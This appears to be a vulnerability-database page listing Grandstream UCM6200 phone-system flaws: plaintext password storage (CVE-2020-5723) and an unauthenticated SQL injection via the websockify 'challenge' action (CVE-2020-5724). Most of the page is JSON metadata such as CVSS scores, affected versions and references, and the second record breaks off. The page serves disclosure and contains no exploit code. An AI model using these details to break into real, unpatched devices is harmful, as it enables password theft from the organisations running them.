
5 vulnerabilities found for ucm6200 by grandstream

VAR-202003-1436

Vulnerability from variot - Updated: 2024-02-13 22:30

The UCM6200 series 1.0.20.22 and below stores unencrypted user passwords in an SQLite database. This could allow an attacker to retrieve all passwords and possibly gain elevated privileges. The UCM6200 series contains a vulnerability in the plaintext storage of important information. Information may be obtained or tampered with, and service operation may be interrupted (DoS). Grandstream UCM6200 is a set of enterprise-level switches used for IP telephone communication, from the US company Grandstream. Note that the sources aggregated in this record disagree on the affected range: this description says 1.0.20.22 and below, while the NVD configuration data in the same record marks firmware before 1.0.20.22 as vulnerable (versionEndExcluding).

Grandstream UCM6200 series 1.0.20.22 and previous versions have security vulnerabilities


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202003-1436",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "ucm6208",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "grandstream",
        "version": "1.0.20.22"
      },
      {
        "model": "ucm6204",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "grandstream",
        "version": "1.0.20.22"
      },
      {
        "model": "ucm6202",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "grandstream",
        "version": "1.0.20.22"
      },
      {
        "model": "ucm6202",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "grandstream",
        "version": "1.0.20.22"
      },
      {
        "model": "ucm6204",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "grandstream",
        "version": "1.0.20.22"
      },
      {
        "model": "ucm6208",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "grandstream",
        "version": "1.0.20.22"
      },
      {
        "model": "ucm6200",
        "scope": "lte",
        "trust": 0.6,
        "vendor": "grandstream",
        "version": "\u003c=1.0.20.22"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-20679"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003514"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-5723"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:grandstream:ucm6202_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "1.0.20.22",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:grandstream:ucm6202:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:grandstream:ucm6204_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "1.0.20.22",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:grandstream:ucm6204:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:grandstream:ucm6208_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "1.0.20.22",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:grandstream:ucm6208:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-5723"
      }
    ]
  },
  "cve": "CVE-2020-5723",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 5.0,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "JVNDB-2020-003514",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2020-20679",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULMON",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CVE-2020-5723",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "MEDIUM",
            "trust": 0.1,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 9.8,
            "baseSeverity": "Critical",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "JVNDB-2020-003514",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2020-5723",
            "trust": 1.0,
            "value": "CRITICAL"
          },
          {
            "author": "NVD",
            "id": "JVNDB-2020-003514",
            "trust": 0.8,
            "value": "Critical"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2020-20679",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202003-1713",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2020-5723",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-20679"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-5723"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003514"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1713"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-5723"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The UCM6200 series 1.0.20.22 and below stores unencrypted user passwords in an SQLite database. This could allow an attacker to retrieve all passwords and possibly gain elevated privileges. UCM6200 The series contains a vulnerability in the plaintext storage of important information.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Grandstream UCM6200 is a set of enterprise-level switches used for IP telephone communication by the US company Grandstream. \n\r\n\r\nGrandstream UCM6200 series 1.0.20.22 and previous versions have security vulnerabilities",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-5723"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003514"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-20679"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-5723"
      }
    ],
    "trust": 2.25
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2020-5723",
        "trust": 3.1
      },
      {
        "db": "TENABLE",
        "id": "TRA-2020-17",
        "trust": 2.5
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003514",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-20679",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1713",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-5723",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-20679"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-5723"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003514"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1713"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-5723"
      }
    ]
  },
  "id": "VAR-202003-1436",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-20679"
      }
    ],
    "trust": 1.45714287
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-20679"
      }
    ]
  },
  "last_update_date": "2024-02-13T22:30:30.332000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "UCM6200 series",
        "trust": 0.8,
        "url": "http://www.grandstream.com/products/ip-pbxs/ucm-series-ip-pbxs/product/ucm6200-series"
      },
      {
        "title": "Patch for Grandstream UCM6200 privilege elevation vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/211855"
      },
      {
        "title": "Grandstream UCM6200 Security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=113108"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-20679"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003514"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1713"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-312",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003514"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-5723"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "https://www.tenable.com/security/research/tra-2020-17"
      },
      {
        "trust": 1.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-5723"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-5723"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/312.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://www.rapid7.com/db/modules/auxiliary/gather/grandstream_ucm62xx_sql_account_guess/"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2020-5723"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003514"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1713"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-5723"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-20679"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-5723"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003514"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1713"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-5723"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-03-31T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2020-20679"
      },
      {
        "date": "2020-03-30T00:00:00",
        "db": "VULMON",
        "id": "CVE-2020-5723"
      },
      {
        "date": "2020-04-17T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2020-003514"
      },
      {
        "date": "2020-03-30T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202003-1713"
      },
      {
        "date": "2020-03-30T20:15:19.883000",
        "db": "NVD",
        "id": "CVE-2020-5723"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-04-01T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2020-20679"
      },
      {
        "date": "2020-04-01T00:00:00",
        "db": "VULMON",
        "id": "CVE-2020-5723"
      },
      {
        "date": "2020-04-17T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2020-003514"
      },
      {
        "date": "2020-04-10T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202003-1713"
      },
      {
        "date": "2020-04-01T14:58:35.183000",
        "db": "NVD",
        "id": "CVE-2020-5723"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1713"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "UCM6200 Vulnerability in plaintext storage of important information in series",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003514"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "other",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1713"
      }
    ],
    "trust": 0.6
  }
}

VAR-202003-1437

Vulnerability from variot - Updated: 2024-02-13 22:30

The Grandstream UCM6200 series before 1.0.20.22 is vulnerable to an SQL injection via the HTTP server's websockify endpoint. A remote unauthenticated attacker can invoke the challenge action with a crafted username and discover user passwords. Grandstream UCM6200 is a set of enterprise-level switches used for IP telephone communication, from the US company Grandstream. The vulnerability stems from a database-backed application failing to validate externally supplied input that is used in SQL statements. Attackers can use this vulnerability to execute unauthorized SQL commands.


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202003-1437",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "ucm6208",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "grandstream",
        "version": "1.0.20.22"
      },
      {
        "model": "ucm6204",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "grandstream",
        "version": "1.0.20.22"
      },
      {
        "model": "ucm6202",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "grandstream",
        "version": "1.0.20.22"
      },
      {
        "model": "ucm6202",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "grandstream",
        "version": "1.0.20.22"
      },
      {
        "model": "ucm6204",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "grandstream",
        "version": "1.0.20.22"
      },
      {
        "model": "ucm6208",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "grandstream",
        "version": "1.0.20.22"
      },
      {
        "model": "ucm6200",
        "scope": "lt",
        "trust": 0.6,
        "vendor": "grandstream",
        "version": "1.0.20.22"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-20680"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003469"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-5724"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:grandstream:ucm6202_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "1.0.20.22",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:grandstream:ucm6202:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:grandstream:ucm6204_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "1.0.20.22",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:grandstream:ucm6204:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:grandstream:ucm6208_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "1.0.20.22",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:grandstream:ucm6208:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-5724"
      }
    ]
  },
  "cve": "CVE-2020-5724",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 5.0,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "JVNDB-2020-003469",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 7.8,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2020-20680",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULMON",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CVE-2020-5724",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "MEDIUM",
            "trust": 0.1,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 7.5,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "JVNDB-2020-003469",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
